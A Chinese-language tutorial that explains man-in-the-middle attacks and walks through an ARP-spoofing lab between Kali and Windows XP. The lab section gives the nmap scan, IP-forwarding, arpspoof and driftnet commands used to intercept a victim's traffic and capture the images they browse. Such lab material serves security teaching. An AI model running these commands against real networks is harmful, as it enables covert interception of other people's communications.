中间人攻击（ARPspoof）

中间人攻击（ARPspoof）

1.介绍：

中间人攻击（Man-in-the-MiddleAttack，简称“MITM攻击”）是一种“间接”的入侵攻击，这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间，这台计算机就称为“中间人”。

2.简介

中间人攻击（Man-in-the-Middle Attack, MITM）是一种由来已久的网络入侵手段，并且当今仍然有着广泛的发展空间，如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之，所谓的MITM攻击就是通过拦截正常的网络通信数据，并进行数据篡改和嗅探，而通信的双方却毫不知情。

随着计算机通信网技术的不断发展，MITM攻击也越来越多样化。最初，攻击者只要将网卡设为混杂模式，伪装成代理服务器监听特定的流量就可以实现攻击，这是因为很多通信协议都是以明文来进行传输的，如HTTP、FTP、Telnet等。后来，随着交换机代替集线器，简单的嗅探攻击已经不能成功，必须先进行ARP欺骗才行。如今，越来越多的服务商（网上银行，邮箱登陆）开始采用加密通信，SSL(Secure Sockets Layer 安全套接层)是一种广泛使用的技术，HTTPS、FTPS等都是建立在其基础上的。

3.攻击方式

中间人攻击（Man-in-the-MiddleAttack，简称“MITM攻击”）中间人攻击很早就成为了黑客常用的一种古老的攻击手段，并且一直到如今还具有极大的扩展空间。在网络安全方面，MITM攻击的使用是很广泛的，曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段。在黑客技术越来越多的运用于以获取经济利益为目标的情况下时，MITM攻击成为对网银、网游、网上交易等最有威胁并且最具破坏性的一种攻击方式。

4.攻击复现

环境准备

（1）kali系统

（2）Windows xp系统（两个系统一定要在同一网段下）

实验开始

1.使用nmap探测局域网内的主机

执行命令 nmap -sP 192.168.80.0/24(这里自己查两台主机的局域网IP)

 2.使用arpspoof 执行arp欺骗，毒化被欺骗者（Windows xp）

执行如下命令启用IP转发：

echo 1 > /proc/sys/net/ipv4/ip_forward

注：这里一定要IP转发不然到截取被攻击者的图片的时候，没有出来

3.接着执行命令，将被欺骗者的流量重定向给攻击者，再由攻击者转发给被欺骗者

arpspoof -i eth0 -t 192.168.80.150 192.168.80.2

4.执行driftnet命令，截取被攻击者图片

driftnet -i eth0

 被攻击者浏览的网页

这样就攻击完成啦~

此次攻击还是比较简单的，有问题可以提问

越努力越幸运~